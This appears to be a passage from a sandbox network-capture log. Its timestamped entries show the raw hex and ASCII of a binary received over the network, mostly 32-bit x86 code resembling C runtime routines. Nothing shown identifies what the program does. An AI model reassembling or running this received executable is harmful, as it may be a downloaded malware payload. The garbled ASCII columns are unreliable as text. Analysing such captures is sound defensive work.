2023-11-18 09:02:38 UTC	805	IN	Data Raw: eb b0 64 8f 05 00 00 00 00 83 c4 18 5f 5e 5b c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 33 8b 44 24 08 8b 48 08 33 c8 e8 1c e8 ff ff 55 8b 68 18 ff 70 0c ff 70 10 ff 70 14 e8 3e ff ff ff 83 c4 0c 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 55 ff 74 24 08 e8 c5 f4 ff ff 83 c4 04 8b 4c 24 08 8b 29 ff 71 1c ff 71 18 ff 71 28 e8 09 ff ff ff 83 c4 0c 5d c2 04 00 55 56 57 53 8b ea 33 c0 33 db 33 d2 33 f6 33 ff ff d1 5b 5f 5e 5d c3 8b ea 8b f1 8b c1 6a 01 e8 03 06 00 00 33 c0 33 db 33 c9 33 d2 33 ff ff e6 55 8b ec 53 56 57 6a 00 52 68 32 2a 00 10 51 e8 0c 25 01 00 5f 5e 5b 5d c3 55 8b 6c 24 08 52 51 ff 74 24 14 e8 a9 fe ff ff 83 c4 0c 5d c2 08 00 55 8b ec 8b 45 08 85 c0 74 0e 3d 74 3a 14 10 74 07 50 e8 8f 50 00 00 59 5d c2 04 00 55 8b ec a1 20 Data Ascii: d_^[L$At3D$H3Uhppp>]D$T$Ut$L$)qqq(]UVWS33333[_^]j33333USVWjRh2*Q%_^[]Ul$RQt$]UEt=t:tPPY]U
2023-11-18 09:02:38 UTC	806	IN	Data Raw: 14 10 83 e0 1f 6a 20 59 2b c8 33 c0 d3 c8 33 05 04 10 14 10 a3 ec 3a 14 10 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 53 56 57 55 6a 00 6a 00 68 18 2f 00 10 ff 75 08 e8 26 20 01 00 5d 5f 5e 5b 8b e5 5d c3 8b 4c 24 04 f7 41 04 06 00 00 00 b8 01 00 00 00 74 32 8b 44 24 14 8b 48 fc 33 c8 e8 7c e2 ff ff 55 8b 68 10 8b 50 28 52 8b 50 24 52 e8 14 00 00 00 83 c4 08 5d 8b 44 24 08 8b 54 24 10 89 02 b8 03 00 00 00 c3 53 56 57 8b 44 24 10 55 50 6a fe 68 20 2f 00 10 64 ff 35 00 00 00 00 a1 04 10 14 10 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 8b 44 24 28 8b 58 08 8b 70 0c 83 fe ff 74 3a 83 7c 24 2c ff 74 06 3b 74 24 2c 76 2d 8d 34 76 8b 0c b3 89 4c 24 0c 89 48 0c 83 7c b3 04 00 75 17 68 01 01 00 00 8b 44 b3 08 e8 Data Ascii: j Y+33:USVWUjjh/u& ]_^[]L$At2D$H3\|UhP(RP$R]D$T$SVWD$UPjh /d53PD$dD$(Xpt:\|$,t;t$,v-4vL$H\|uhD
2023-11-18 09:02:38 UTC	808	IN	Data Raw: c3 8b 65 e8 ff 75 e0 e8 73 3b 00 00 cc 8b ff 55 8b ec 56 8b 75 08 85 f6 74 25 83 7e 08 00 74 09 ff 76 08 ff 15 dc 80 11 10 83 7e 0c 00 74 09 ff 76 0c ff 15 20 81 11 10 56 e8 94 46 00 00 59 5e 5d c2 04 00 8b ff 55 8b ec 56 e8 bb 58 00 00 85 c0 75 09 ff 75 08 ff 15 bc 81 11 10 8b b0 60 03 00 00 85 f6 74 ed 80 7e 10 00 74 05 e8 fc 5d 00 00 8b 46 08 83 f8 ff 74 0b 85 c0 74 07 50 ff 15 dc 80 11 10 8b 46 0c 83 f8 ff 74 c7 85 c0 74 c3 ff 75 08 50 ff 15 c0 81 11 10 cc 8b ff 55 8b ec 51 56 6a 14 6a 01 e8 4c 47 00 00 6a 00 8b f0 e8 1e 46 00 00 83 c4 0c 85 f6 74 18 8b 45 0c 8b 4d 08 89 46 04 8d 46 0c 50 51 6a 04 89 0e ff 15 c4 81 11 10 6a 00 8d 4d ff e8 30 ff ff ff 8b c6 5e 8b e5 5d c3 8b ff 55 8b ec 51 51 83 7d 10 00 75 14 e8 b5 1d 00 00 c7 00 16 00 00 00 e8 a4 53 Data Ascii: eus;UVut%~tv~tv VFY^]UVXuu`t~t]FttPFttuPUQVjjLGjFtEMFFPQjjM0^]UQQ}uS
2023-11-18 09:02:38 UTC	809	IN	Data Raw: 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 b4 ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 bf 83 f8 19 77 03 83 c1 20 8b c1 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 10 6a 00 ff 75 08 e8 9e ff ff ff 59 59 8b c8 eb 0e 8b 4d 08 8d 41 9f 83 f8 19 77 03 83 c1 e0 8b c1 5d c3 8b ff 55 8b ec 83 ec 14 56 8b 75 08 85 f6 75 13 e8 dd 18 00 00 6a 16 5e 89 30 e8 cd 4e 00 00 8b c6 eb 53 57 6a 09 83 c8 ff 8b fe 59 f3 ab 8b 7d 0c 85 ff 75 13 e8 b8 18 00 00 6a 16 5e 89 30 e8 a8 4e 00 00 8b c6 eb 2d 53 33 db 39 5f 04 7f 06 7c 16 39 1f 72 12 6a 07 58 39 47 04 7c 1d 7f 08 81 3f ff 6f 40 93 76 13 e8 85 18 00 00 6a 16 5e 89 30 8b c6 5b 5f 5e 8b e5 5d c3 e8 61 68 00 00 8d 45 f8 89 5d f8 50 89 5d f4 89 5d fc e8 0d 5e 00 00 59 85 c0 0f 85 e4 01 00 00 8d 45 f4 50 Data Ascii: UD=tjuYYMAw ]UD=tjuYYMAw]UVuuj^0NSWjY}uj^0N-S39_\|9rjX9G\|?o@vj^0[_^]ahE]P]]^YEP
2023-11-18 09:02:38 UTC	810	IN	Data Raw: e8 54 f9 ff ff 8d 45 f4 50 68 03 01 00 00 ff 75 08 e8 2a fa ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 8d 4d f0 ff 75 0c e8 19 f9 ff ff 83 7d 08 09 75 05 6a 40 58 eb 11 8d 45 f4 50 6a 40 ff 75 08 e8 e7 f9 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 d6 f8 ff ff 8d 45 f4 50 6a 04 ff 75 08 e8 af f9 ff ff 83 c4 0c 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 0e 6a 00 ff 75 08 e8 32 ff ff ff 59 59 5d c3 8b 4d 08 a1 68 10 14 10 0f b7 04 48 25 03 01 00 00 5d c3 8b ff 55 8b ec a1 44 3d 14 10 85 c0 74 0e 6a 00 ff 75 08 e8 3e ff ff ff 59 59 5d c3 8b 4d 08 83 f9 09 75 05 6a 40 58 5d Data Ascii: TEPhu*}tMP]UMu}uj@XEPj@u}tMP]UuMEPju}tMP]UD=tju2YY]MhH%]UD=tju>YY]Muj@X]
2023-11-18 09:02:39 UTC	812	IN	Data Raw: 10 ff d6 83 c4 08 85 c0 7e 10 57 ff b5 08 ff ff ff 53 e8 8e fe ff ff 83 c4 0c 8b 85 08 ff ff ff 8b f8 8b b5 fc fe ff ff 8b 95 04 ff ff ff 89 85 ec fe ff ff 90 3b de 76 37 03 f2 89 b5 f4 fe ff ff 3b f3 73 25 8b 8d 00 ff ff ff 53 56 ff 15 40 82 11 10 ff 95 00 ff ff ff 8b 95 04 ff ff ff 83 c4 08 85 c0 7e d3 3b de 77 3d 8b 85 08 ff ff ff 8b bd 00 ff ff ff 03 f2 3b f0 77 1f 53 56 8b cf ff 15 40 82 11 10 ff d7 8b 95 04 ff ff ff 83 c4 08 85 c0 8b 85 08 ff ff ff 7e db 8b bd ec fe ff ff 89 b5 f4 fe ff ff 8b b5 00 ff ff ff eb 06 8d 9b 00 00 00 00 8b 95 04 ff ff ff 2b fa 3b fb 76 19 53 57 8b ce ff 15 40 82 11 10 ff d6 83 c4 08 85 c0 7f e1 8b 95 04 ff ff ff 8b b5 f4 fe ff ff 89 bd ec fe ff ff 3b fe 72 5e 89 95 e8 fe ff ff 89 bd e4 fe ff ff 3b f7 74 33 8b de 8b d7 8b Data Ascii: ~WS;v7;s%SV@~;w=;wSV@~+;vSW@;r^;t3
2023-11-18 09:02:39 UTC	813	IN	Data Raw: 00 00 80 72 08 77 e8 83 7d 0c 00 77 e2 85 c0 75 11 81 7d 10 ff ff ff 7f 72 08 77 d3 83 7d 0c ff 77 cd 32 c0 5d c3 8b ff 55 8b ec 83 ec 28 8d 4d 0c 53 57 e8 76 1b 00 00 84 c0 74 21 8b 7d 14 85 ff 74 30 83 ff 02 7c 05 83 ff 24 7e 26 e8 c7 09 00 00 c7 00 16 00 00 00 e8 b6 3f 00 00 33 db 8b 55 10 85 d2 74 05 8b 4d 0c 89 0a 5f 8b c3 5b 8b e5 5d c3 56 ff 75 08 8d 4d d8 e8 fa ee ff ff 8b 45 0c 33 f6 89 75 f4 89 45 e8 eb 03 8b 45 0c 8a 18 40 89 45 0c 8d 45 dc 50 0f b6 c3 6a 08 50 88 5d fc e8 b9 ef ff ff 83 c4 0c 85 c0 75 de 38 45 18 0f 95 c0 89 45 f8 80 fb 2d 75 08 83 c8 02 89 45 f8 eb 05 80 fb 2b 75 0e 8b 75 0c 8a 1e 46 88 5d fc 89 75 0c eb 03 8b 75 0c 85 ff 74 05 83 ff 10 75 78 8a c3 2c 30 3c 09 77 08 0f be c3 83 c0 d0 eb 23 8a c3 2c 61 3c 19 77 08 0f be c3 83 Data Ascii: rw}wu}rw}w2]U(MSWvt!}t0\|$~&?3UtM_[]VuME3uEE@EEPjP]u8EE-uE+uuF]uutux,0<w#,a<w
2023-11-18 09:02:39 UTC	815	IN	Data Raw: 89 5d e8 33 db 89 45 f0 89 4d ec 6a 30 58 66 3b f0 0f 82 a1 01 00 00 6a 3a 5a 66 3b f2 73 0a 0f b7 fe 2b f8 e9 8a 01 00 00 b8 10 ff 00 00 66 3b f0 0f 83 6b 01 00 00 b8 60 06 00 00 66 3b f0 0f 82 73 01 00 00 8d 50 0a 66 3b f2 72 d2 b8 f0 06 00 00 66 3b f0 0f 82 5d 01 00 00 8d 50 0a 66 3b f2 72 bc b8 66 09 00 00 66 3b f0 0f 82 47 01 00 00 8d 50 0a 66 3b f2 72 a6 8d 42 76 66 3b f0 0f 82 33 01 00 00 8d 50 0a 66 3b f2 72 92 8d 42 76 66 3b f0 0f 82 1f 01 00 00 8d 50 0a 66 3b f2 0f 82 7a ff ff ff 8d 42 76 66 3b f0 0f 82 07 01 00 00 8d 50 0a 66 3b f2 0f 82 62 ff ff ff 8d 42 76 66 3b f0 0f 82 ef 00 00 00 8d 50 0a 66 3b f2 0f 82 4a ff ff ff b8 66 0c 00 00 66 3b f0 0f 82 d5 00 00 00 8d 50 0a 66 3b f2 0f 82 30 ff ff ff 8d 42 76 66 3b f0 0f 82 bd 00 00 00 8d 50 0a 66 Data Ascii: ]3EMj0Xf;j:Zf;s+f;k`f;sPf;rf;]Pf;rff;GPf;rBvf;3Pf;rBvf;Pf;zBvf;Pf;bBvf;Pf;Jff;Pf;0Bvf;Pf
2023-11-18 09:02:39 UTC	816	IN	Data Raw: 15 00 00 dc 45 f8 51 51 dd 1c 24 e8 02 5b 00 00 59 59 eb 0d dd d9 e8 9f 64 00 00 dc 05 00 8d 11 10 8b e5 5d c3 8b ff 55 8b ec 81 ec 84 04 00 00 a1 04 10 14 10 33 c5 89 45 fc 83 7d 18 00 8b 45 10 53 8b 5d 14 89 85 a0 fb ff ff 75 18 e8 15 ff ff ff c7 00 16 00 00 00 e8 04 35 00 00 83 c8 ff e9 11 01 00 00 85 db 74 04 85 c0 74 e0 56 57 ff 75 1c 8d 8d 7c fb ff ff e8 4a e4 ff ff 8b 4d 08 8d bd 90 fb ff ff 33 c0 33 d2 ab ab ab ab 8b c1 8b bd a0 fb ff ff 83 e0 02 89 85 8c fb ff ff 0b c2 89 bd 90 fb ff ff 89 9d 94 fb ff ff 89 95 98 fb ff ff 75 0a 88 95 9c fb ff ff 85 ff 75 07 c6 85 9c fb ff ff 01 ff 75 20 8d 85 90 fb ff ff 89 85 a0 fb ff ff 8d 85 80 fb ff ff 50 ff 75 18 8d 85 a0 fb ff ff ff 75 0c 51 50 8d 8d a4 fb ff ff e8 54 03 00 00 8d 8d a4 fb ff ff e8 fd 04 00 Data Ascii: EQQ$[YYd]U3E}ES]u5ttVWu\|JM33uuu PuuQPT
2023-11-18 09:02:39 UTC	817	IN	Data Raw: 65 eb 0c 46 0f b6 06 50 e8 16 e7 ff ff 85 c0 59 75 f1 0f be 06 50 e8 a1 e0 ff ff 59 83 f8 78 75 03 83 c6 02 8b 45 0c 8a 0e 8b 00 8b 80 88 00 00 00 8b 00 8a 00 88 06 46 8a 06 88 0e 8a c8 8a 06 46 84 c0 75 f3 5e 5d c3 8b ff 55 8b ec 51 53 56 8b f1 8d 4d fc 57 6a 0a 51 8b 7e 0c 8b 1f 83 27 00 8b 46 10 83 65 fc 00 48 50 e8 1d 60 00 00 8b 4d 08 83 c4 0c 89 01 8b 46 0c 83 38 22 74 0f 8b 45 fc 3b 46 10 72 07 89 46 10 b0 01 eb 02 32 c0 83 3f 00 75 06 85 db 74 02 89 1f 5f 5e 5b 8b e5 5d c2 04 00 8b ff 56 8b f1 8d 8e 48 04 00 00 e8 ef 0a 00 00 84 c0 75 05 83 c8 ff 5e c3 53 33 db 39 5e 10 0f 85 bb 00 00 00 e8 40 f9 ff ff c7 00 16 00 00 00 e8 2f 2f 00 00 83 c8 ff e9 b9 00 00 00 89 5e 38 89 5e 1c e9 85 00 00 00 ff 46 10 39 5e 18 0f 8c 8c 00 00 00 ff 76 1c 0f b6 46 31 Data Ascii: eFPYuPYxuEFFu^]UQSVMWjQ~'FeHP`MF8"tE;FrF2?ut_^[]VHu^S39^@//^8^F9^vF1
2023-11-18 09:02:39 UTC	819	IN	Data Raw: 06 c6 45 fc 2d eb 16 84 d3 74 06 c6 45 fc 2b eb 0c 8b c2 d1 e8 84 c3 74 06 c6 45 fc 20 8b fb 8a 4e 31 80 f9 78 74 05 80 f9 58 75 09 8b c2 c1 e8 05 84 c3 75 02 32 db 80 f9 61 74 09 80 f9 41 74 04 32 c0 eb 02 b0 01 84 db 75 04 84 c0 74 27 c6 44 3d fc 30 80 f9 58 74 09 80 f9 41 74 04 32 c0 eb 02 b0 01 84 c0 0f 94 c0 fe c8 24 e0 04 78 88 44 3d fd 83 c7 02 8b 5e 24 2b 5e 38 2b df f6 c2 0c 75 16 8d 46 18 50 53 8d 86 48 04 00 00 6a 20 50 e8 52 f8 ff ff 83 c4 10 ff 76 0c 8d 46 18 50 57 8d 45 fc 8d 8e 48 04 00 00 50 e8 9e 06 00 00 8b 4e 20 8d 7e 18 8b c1 c1 e8 03 a8 01 74 1b c1 e9 02 f6 c1 01 75 13 57 53 8d 86 48 04 00 00 6a 30 50 e8 11 f8 ff ff 83 c4 10 6a 00 8b ce e8 c4 05 00 00 83 3f 00 7c 1d 8b 46 20 c1 e8 02 a8 01 74 13 57 53 8d 86 48 04 00 00 6a 20 50 e8 e6 Data Ascii: E-tE+tE N1xtXuu2atAt2ut'D=0XtAt2$xD=^$+^8+uFPSHj PRvFPWEHPN ~tuWSHj0Pj?\|F tWSHj P
2023-11-18 09:02:39 UTC	820	IN	Data Raw: ff 76 2c e8 d8 fb ff ff 59 83 e8 01 74 2b 83 e8 01 74 1d 48 83 e8 01 74 10 83 e8 04 75 ce 8b 46 18 99 89 07 89 57 04 eb 15 8b 46 18 89 07 eb 0e 66 8b 46 18 66 89 07 eb 05 8a 46 18 88 07 c6 46 30 01 b0 01 5f 5e c3 8b 51 20 8b c2 c1 e8 05 a8 01 74 09 81 ca 80 00 00 00 89 51 20 6a 00 6a 08 e8 24 fe ff ff c3 6a 01 6a 10 c7 41 28 08 00 00 00 c7 41 2c 0a 00 00 00 e8 0c fe ff ff c3 8b ff 53 56 8b f1 57 83 46 14 04 8b 46 14 8b 7e 28 8b 58 fc 89 5e 34 83 ff ff 75 05 bf ff ff ff 7f ff 76 2c 0f b6 46 31 50 ff 76 04 ff 36 e8 83 f1 ff ff 83 c4 10 84 c0 74 1a 85 db 75 07 c7 46 34 6c 8d 11 10 57 ff 76 34 c6 46 3c 01 e8 af 58 00 00 eb 14 85 db 75 07 c7 46 34 64 8d 11 10 57 ff 76 34 e8 72 57 00 00 59 59 5f 89 46 38 b0 01 5e 5b c3 83 39 00 75 13 e8 61 ee ff ff c7 00 16 00 Data Ascii: v,Yt+tHtuFWFfFfFF0_^Q tQ jj$jjA(A,SVWFF~(X^4uv,F1Pv6tuF4lWv4F<XuF4dWv4rWYY_F8^[9ua
2023-11-18 09:02:39 UTC	821	IN	Data Raw: 00 00 00 e9 f3 fe ff ff d9 ee 84 cd 0f 84 22 19 00 00 d9 e0 e9 1b 19 00 00 dd d8 d9 e8 e9 12 19 00 00 d9 c1 e8 1e 00 00 00 d9 e0 84 c9 0f 85 9d fe ff ff dd d8 dd d8 db 2d 70 90 11 10 b8 01 00 00 00 e9 b4 fe ff ff d9 c0 d9 fc d8 d9 b1 00 9b df e0 9e 75 17 dc 0d 84 8d 11 10 fe c1 d9 c0 d9 fc de d9 9b df e0 9e 75 02 fe c1 c3 dd d8 c3 cc cc cc cc cc cc cc 83 ec 0c dd 14 24 e8 9d 18 00 00 e8 0d 00 00 00 83 c4 0c c3 8d 54 24 04 e8 48 18 00 00 52 9b d9 3c 24 8b 44 24 0c 74 51 66 81 3c 24 7f 02 74 05 e8 00 18 00 00 a9 00 00 00 80 75 1f d9 fa 83 3d 68 3c 14 10 00 0f 85 73 18 00 00 ba 05 00 00 00 8d 0d 90 8d 11 10 e9 70 18 00 00 a9 00 00 f0 7f 75 2c a9 ff ff 0f 00 75 25 83 7c 24 08 00 75 1e eb cc e8 d5 17 00 00 eb 22 a9 ff ff 0f 00 75 f2 83 7c 24 08 00 75 eb 25 00 Data Ascii: "-puu$T$HR<$D$tQf<$tu=h<spu,u%\|$u"u\|$u%
2023-11-18 09:02:39 UTC	823	IN	Data Raw: 75 11 68 74 82 11 10 68 64 82 11 10 e8 00 fd ff ff 59 59 68 7c 82 11 10 68 78 82 11 10 e8 ef fc ff ff 59 59 85 f6 75 07 c6 05 34 3b 14 10 01 c7 45 fc fe ff ff ff e8 27 00 00 00 85 f6 75 2c ff 75 08 e8 2a 00 00 00 8b 45 ec 8b 00 ff 30 e8 f2 fe ff ff 83 c4 04 c3 8b 65 e8 e8 36 0c 00 00 8b 75 10 6a 02 e8 6a 70 00 00 59 c3 e8 f6 e2 00 00 c3 8b ff 55 8b ec e8 60 24 00 00 84 c0 74 20 64 a1 30 00 00 00 8b 40 68 c1 e8 08 a8 01 75 10 ff 75 08 ff 15 7c 81 11 10 50 ff 15 80 81 11 10 ff 75 08 e8 4f 00 00 00 59 ff 75 08 ff 15 c8 81 11 10 cc 6a 00 ff 15 1c 81 11 10 8b c8 85 c9 75 03 32 c0 c3 b8 4d 5a 00 00 66 39 01 75 f3 8b 41 3c 03 c1 81 38 50 45 00 00 75 e6 b9 0b 01 00 00 66 39 48 18 75 db 83 78 74 0e 76 d5 83 b8 e8 00 00 00 00 0f 95 c0 c3 8b ff 55 8b ec 51 51 a1 04 Data Ascii: uhthdYYh\|hxYYu4;E'u,u*E0e6ujjpYU`$t d0@huu\|PuOYuju2MZf9uA<8PEuf9HuxtvUQQ
2023-11-18 09:02:39 UTC	824	IN	Data Raw: d8 59 59 85 db 74 6d 89 5d fc eb 52 8b cf 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 80 3f 3d 8d 41 01 89 45 f8 74 37 6a 01 50 e8 70 08 00 00 8b f0 59 59 85 f6 74 30 57 ff 75 f8 56 e8 c1 07 00 00 83 c4 0c 85 c0 75 41 8b 45 fc 6a 00 89 30 83 c0 04 89 45 fc e8 20 07 00 00 8b 45 f8 59 03 f8 80 3f 00 75 a9 eb 11 53 e8 29 00 00 00 6a 00 e8 06 07 00 00 59 59 33 db 6a 00 e8 fb 06 00 00 59 5f 5e 8b c3 5b 8b e5 5d c3 33 c0 50 50 50 50 50 e8 c8 14 00 00 cc 8b ff 55 8b ec 56 8b 75 08 85 f6 74 1f 8b 06 57 8b fe eb 0c 50 e8 ca 06 00 00 8d 7f 04 8b 07 59 85 c0 75 f0 56 e8 ba 06 00 00 59 5f 5e 5d c3 8b ff 57 8b 3d 44 3c 14 10 85 ff 75 05 83 c8 ff 5f c3 53 56 33 db eb 51 53 53 53 53 6a ff ff 37 53 53 ff 15 24 81 11 10 8b d8 85 db 74 4c 6a 01 53 e8 a4 07 00 00 8b f0 59 59 85 f6 Data Ascii: YYtm]RQAu+?=AEt7jPpYYt0WuVuAEj0E EY?uS)jYY3jY_^[]3PPPPPUVutWPYuVY_^]W=D<u_SV3QSSSSj7SS$tLjSYY
2023-11-18 09:02:39 UTC	825	IN	Data Raw: 0b 83 c4 10 8b 09 89 41 08 33 c0 5f 5b 5e 8b e5 5d c3 8b ff 55 8b ec ff 75 08 68 50 3c 14 10 e8 5e 00 00 00 59 59 5d c3 8b ff 55 8b ec 51 8d 45 08 89 45 fc 8d 45 fc 50 6a 02 e8 03 fd ff ff 59 59 8b e5 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 05 83 c8 ff eb 28 8b 06 3b 46 08 75 1f a1 04 10 14 10 83 e0 1f 6a 20 59 2b c8 33 c0 d3 c8 33 05 04 10 14 10 89 06 89 46 04 89 46 08 33 c0 5e 5d c3 8b ff 55 8b ec 51 51 8d 45 08 89 45 f8 8d 45 0c 89 45 fc 8d 45 f8 50 6a 02 e8 ca fc ff ff 59 59 8b e5 5d c3 68 68 10 14 10 b9 48 3d 14 10 e8 42 0d 00 00 b0 01 c3 68 50 3c 14 10 e8 83 ff ff ff c7 04 24 5c 3c 14 10 e8 77 ff ff ff 59 b0 01 c3 e8 8d fb ff ff b0 01 c3 b0 01 c3 a1 04 10 14 10 56 6a 20 83 e0 1f 33 f6 59 2b c8 d3 ce 33 35 04 10 14 10 56 e8 68 0e 00 00 56 e8 62 77 Data Ascii: A3_[^]UuhP<^YY]UQEEEPjYY]UVuu(;Fuj Y+33FF3^]UQQEEEEEPjYY]hhH=BhP<$\<wYVj 3Y+35VhVbw
2023-11-18 09:02:39 UTC	827	IN	Data Raw: da f2 0f 5c d5 f2 0f 59 dd f2 0f 58 1d 28 90 11 10 f2 0f 5e d3 66 0f 14 d2 eb 19 b8 00 03 00 00 f3 0f 7e c2 f3 0f 7e 15 20 90 11 10 f2 0f 5e d0 66 0f 14 d2 f3 0f 7e 04 c5 00 af 11 10 f3 0f 7e 24 c5 08 af 11 10 66 0f 28 ca 66 0f 59 ca 66 0f 28 d9 66 0f 59 d9 66 0f 28 2d 00 90 11 10 66 0f 59 eb 66 0f 58 2d f0 8f 11 10 66 0f 59 eb 66 0f 58 2d e0 8f 11 10 66 0f 59 eb 66 0f 58 2d d0 8f 11 10 f2 0f 59 e9 66 0f 28 dd 66 0f c6 db 01 f2 0f 58 eb f2 0f 59 ea f2 0f 5c ec f2 0f 5c ea f2 0f 5c c5 66 0f 56 c6 66 0f d6 44 24 04 dd 44 24 04 c3 66 0f 2f 15 18 90 11 10 75 05 dd 44 24 04 c3 66 0f 2f 15 60 90 11 10 73 1d dd 05 68 90 11 10 dc 0d 68 90 11 10 83 ec 08 dd 1c 24 dd 04 24 83 c4 08 dc 44 24 04 c3 dd 05 68 90 11 10 dc 0d 68 90 11 10 dc 44 24 04 c3 f3 0f 7e c2 f3 0f Data Ascii: \YX(^f~~ ^f~~$f(fYf(fYf(-fYfX-fYfX-fYfX-Yf(fXY\\\fVfD$D$f/uD$f/`shh$$D$hhD$~
2023-11-18 09:02:39 UTC	828	IN	Data Raw: 12 0d 40 91 11 10 f2 0f 59 c8 66 0f 12 15 48 91 11 10 f2 0f 2d d1 f2 0f 58 ca 66 0f 12 1d 60 91 11 10 f2 0f 5c ca 66 0f 28 15 50 91 11 10 f2 0f 59 d9 66 0f 14 c9 81 c2 00 76 1c 00 f2 0f 10 e0 83 e2 3f 66 0f 28 2d 30 91 11 10 8d 05 10 c7 11 10 c1 e2 05 03 c2 66 0f 59 d1 f2 0f 5c c3 f2 0f 59 0d 68 91 11 10 f2 0f 5c e3 66 0f 12 78 08 66 0f 14 c0 f2 0f 10 dc f2 0f 5c e2 66 0f 59 e8 66 0f 5c c2 66 0f 28 35 10 91 11 10 f2 0f 59 fc f2 0f 5c dc 66 0f 59 e8 66 0f 59 c0 f2 0f 5c da 66 0f 28 10 f2 0f 5c cb 66 0f 12 58 18 f2 0f 58 d3 f2 0f 5c fa f2 0f 59 d4 66 0f 59 f0 f2 0f 59 dc 66 0f 59 d0 66 0f 59 c0 66 0f 58 2d 20 91 11 10 f2 0f 59 20 66 0f 58 35 00 91 11 10 66 0f 59 e8 f2 0f 10 c3 f2 0f 58 58 08 f2 0f 59 cf f2 0f 10 fc f2 0f 58 e3 66 0f 58 f5 66 0f 12 68 08 f2 Data Ascii: @YfH-Xf`\f(PYfv?f(-0fY\Yh\fxf\fYf\f(5Y\fYfY\f(\fXX\YfYYfYfYfX- Y fX5fYXXYXfXfh
2023-11-18 09:02:39 UTC	829	IN	Data Raw: 74 05 6a 05 59 cd 29 56 6a 01 be 17 04 00 c0 56 6a 02 e8 06 fe ff ff 83 c4 0c 56 ff 15 7c 81 11 10 50 ff 15 80 81 11 10 5e c3 6a 08 68 b8 de 13 10 e8 7a 93 ff ff 8b 45 08 ff 30 e8 8e 55 00 00 59 83 65 fc 00 8b 4d 0c 8b 41 04 8b 00 ff 30 8b 01 ff 30 e8 f9 02 00 00 59 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e8 8b 93 ff ff c2 0c 00 8b 45 10 ff 30 e8 9e 55 00 00 59 c3 6a 08 68 d8 de 13 10 e8 2a 93 ff ff 8b 45 08 ff 30 e8 3e 55 00 00 59 83 65 fc 00 8b 45 0c 8b 00 8b 00 8b 48 48 85 c9 74 18 83 c8 ff f0 0f c1 01 75 0f 81 f9 80 15 14 10 74 07 51 e8 5a f1 ff ff 59 c7 45 fc fe ff ff ff e8 08 00 00 00 e8 2a 93 ff ff c2 0c 00 8b 45 10 ff 30 e8 3d 55 00 00 59 c3 6a 08 68 f8 de 13 10 e8 c9 92 ff ff 8b 45 08 ff 30 e8 dd 54 00 00 59 83 65 fc 00 6a 00 8b 45 0c 8b 00 ff 30 Data Ascii: tjY)VjVjV\|P^jhzE0UYeMA00YYEE0UYjhE0>UYeEHHtutQZYEE0=UYjhE0TYejE0
2023-11-18 09:02:39 UTC	831	IN	Data Raw: 3b f7 74 69 85 f6 74 04 8b c6 eb 63 8b 75 10 3b 75 14 74 1a ff 36 e8 59 00 00 00 59 85 c0 75 2f 83 c6 04 3b 75 14 75 ec 8b 15 04 10 14 10 33 c0 85 c0 74 29 ff 75 0c 50 ff 15 f8 80 11 10 8b f0 85 f6 74 13 56 e8 68 9d ff ff 59 87 03 eb b9 8b 15 04 10 14 10 eb d9 8b 15 04 10 14 10 8b c2 6a 20 83 e0 1f 59 2b c8 d3 cf 33 fa 87 3b 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 8b 45 08 57 8d 3c 85 70 3c 14 10 8b 0f 85 c9 74 0b 8d 41 01 f7 d8 1b c0 23 c1 eb 57 53 8b 1c 85 50 92 11 10 56 68 00 08 00 00 6a 00 53 ff 15 b4 81 11 10 8b f0 85 f6 75 27 ff 15 ac 80 11 10 83 f8 57 75 0d 56 56 53 ff 15 b4 81 11 10 8b f0 eb 02 33 f6 85 f6 75 09 83 c8 ff 87 07 33 c0 eb 11 8b c6 87 07 85 c0 74 07 56 ff 15 20 81 11 10 8b c6 5e 5b 5f 5d c3 8b ff 55 8b ec 51 a1 04 10 14 10 33 c5 89 45 fc Data Ascii: ;titcu;ut6YYu/;uu3t)uPtVhYj Y+3;3_^[]UEW<p<tA#WSPVhjSu'WuVVS3u3tV ^[_]UQ3E
2023-11-18 09:02:39 UTC	832	IN	Data Raw: 70 3c 14 10 83 3e 00 74 10 83 3e ff 74 08 ff 36 ff 15 20 81 11 10 83 26 00 83 c6 04 81 fe c0 3c 14 10 75 e0 5e b0 01 5d c3 8b ff 55 8b ec 51 e8 e2 f8 ff ff 8b 48 4c 89 4d fc 8d 4d fc 51 50 e8 9e 03 00 00 8b 45 fc 59 59 8b 00 8b e5 5d c3 8b ff 55 8b ec 83 ec 10 ff 75 0c 8d 4d f0 e8 39 a4 ff ff 8b 45 f4 0f b6 4d 08 8b 00 0f b7 04 48 25 00 80 00 00 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 83 ec 24 a1 04 10 14 10 33 c5 89 45 fc 53 ff 75 10 8b 5d 08 8d 4d e0 e8 f2 a3 ff ff 8d 43 01 3d 00 01 00 00 77 0b 8b 45 e4 8b 00 0f b7 04 58 eb 7a 8b c3 8d 4d e4 c1 f8 08 89 45 dc 51 0f b6 c0 50 e8 7c ff ff ff 59 59 85 c0 74 13 8b 45 dc 88 45 f0 33 c0 6a 02 88 5d f1 88 45 f2 59 eb 0b 33 c0 88 5d f0 33 c9 88 45 f1 41 89 45 f4 66 89 45 f8 8b Data Ascii: p<>t>t6 &<u^]UQHLMMQPEYY]UuM9EMH%}tMP]U$3ESu]MC=wEXzMEQP\|YYtEE3j]EY3]3EAEfE
